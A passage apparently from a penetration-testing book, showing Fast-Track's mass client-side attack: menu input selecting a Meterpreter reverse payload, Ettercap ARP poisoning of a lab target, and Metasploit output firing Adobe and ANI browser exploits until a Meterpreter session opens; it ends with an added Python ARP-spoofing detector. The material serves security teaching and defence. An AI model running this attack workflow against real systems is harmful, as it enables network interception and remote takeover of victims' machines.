The mass client-side attack is similar to the Browser Autopwn function; however, this attack includes additional exploits and built-in features that can incorporate ARP cache and DNS poisoning on the target’s machine, and additional browser exploits not included in Metasploit.
When a user connects to your web server, Fast-Track will fire off every exploit in its arsenal as well as those in the Metasploit Framework. If the user’s machine is susceptible to a specific vulnerability within one of these libraries, the attacker will obtain full access to the target machine.
Enter the number:4
. . . SNIP . . .
Enter the IP Address you want the web server to listen on:10.211.55.130
Specify your payload:
1. Windows Meterpreter Reverse Meterpreter
2. Generic Bind Shell
3. Windows VNC Inject Reverse_TCP (aka "Da Gui")
4. Reverse TCP Shell
Enter the number of the payload you want:1
After selecting option 4, Mass Client-Side Attack, from the main menu, tell Fast-Track what IP address the web server should listen on, and then choose a payload.
Next, decide whether to use Ettercap to ARP-poison your target machine. Ettercap will intercept all requests that the target makes and redirect them to your malicious server. After confirming that you want to use Ettercap, enter the IP address of the target you want to poison. Fast-Track will then go ahead and set up Ettercap for you.
Would you like to use Ettercap to ARP poison a host yes or no:yes
. . . SNIP . . .
What IP Address do you want to poison:10.211.55.128
Setting up the ettercap filters....
Filter created...
Compiling Ettercap filter....
. . . SNIP . . .
Filter compiled...
Running Ettercap and poisoning target...
Once a client connects to your malicious server, Metasploit fires exploits at the target. In the following listing, you can see that the Adobe exploit is successful, and a Meterpreter shell is waiting.
You could use ARP cache poisoning within this attack, but it will only work when you are on the same local and unrestricted subnet as the target.
[*] Local IP: http://10.211.55.130:8071/
[*] Server started.
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:8072/
[*] Local IP: http://10.211.55.130:8072/
[*] Server started.
msf exploit(zenturiprogramchecker_unsafe) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8073/
[*] Local IP: http://10.211.55.130:8073/
[*] Server started.
[*] Sending Adobe Collab.getIcon() Buffer Overflow to 10.211.55.128:1044...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 10.211.55.128:1047...
[*] Sending Adobe JBIG2Decode Memory Corruption Exploit to 10.211.55.128:1046...
[*] Sending exploit to 10.211.55.128:1049...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 10.211.55.128:1076...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (10.211.55.130:9007 -> 10.211.55.128:1077
msf exploit(zenturiprogramchecker_unsafe) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  10.211.55.130:9007 -> 10.211.55.128:1077

msf exploit(zenturiprogramchecker_unsafe) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
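As an added defensive counterpart to the Ettercap ARP-poisoning step above (example code, not from the book, Fast-Track or Ettercap): a small detector that reads ARP replies seen on the segment and alerts on the signs of cache poisoning. The IP addresses reuse the lab addresses from the listings; the MAC addresses and the reply sequence are constructed.

```python
# Added example, not from the book or the Fast-Track/Ettercap code: a minimal
# ARP-spoofing detector of the kind a defender runs on the segment that the
# Ettercap step poisons. It consumes ARP replies ("is-at") and flags an IP
# whose hardware address changes, a MAC that claims several IPs, and a
# pinned (trusted) IP answered with the wrong MAC.

def detect_arp_spoofing(replies, trusted=None):
    """replies: iterable of (sender_ip, sender_mac) from ARP replies seen on
    the wire. trusted: optional {ip: mac} pins for the gateway and servers.
    Returns a list of alert tuples whose first element is the alert kind."""
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    ip_to_mac = {}   # last MAC seen answering for each IP
    mac_to_ips = {}  # every IP each MAC has claimed so far
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        known = ip_to_mac.get(ip)
        if known is not None and known != mac:
            alerts.append(("mac-changed", ip, known, mac))
        ip_to_mac[ip] = mac
        if ip in trusted and trusted[ip] != mac:
            alerts.append(("trusted-mismatch", ip, trusted[ip], mac))
        owned = mac_to_ips.setdefault(mac, set())
        if owned and ip not in owned:
            alerts.append(("mac-claims-multiple", mac, tuple(sorted(owned | {ip}))))
        owned.add(ip)
    return alerts

# Constructed sample replies (not a capture from the book's lab); the MAC
# addresses are made up. 10.211.55.1 plays the gateway, 10.211.55.128 the
# victim and 10.211.55.130 the host running the poisoning attack.
SAMPLE_REPLIES = [
    ("10.211.55.1",   "00:1c:42:00:00:01"),  # gateway, genuine
    ("10.211.55.128", "00:1c:42:00:00:80"),  # victim, genuine
    ("10.211.55.130", "00:1c:42:00:00:ee"),  # poisoning host, its own IP
    ("10.211.55.1",   "00:1c:42:00:00:ee"),  # gateway IP now answered by the poisoning host
    ("10.211.55.128", "00:1c:42:00:00:ee"),  # victim IP also answered by it
]
TRUSTED = {"10.211.55.1": "00:1c:42:00:00:01"}

if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_REPLIES, TRUSTED):
        print(*alert)
```

The "mac-changed" rule alone also fires on legitimate DHCP churn, so in practice pin the gateway and servers via `trusted` and treat that rule as the high-confidence signal.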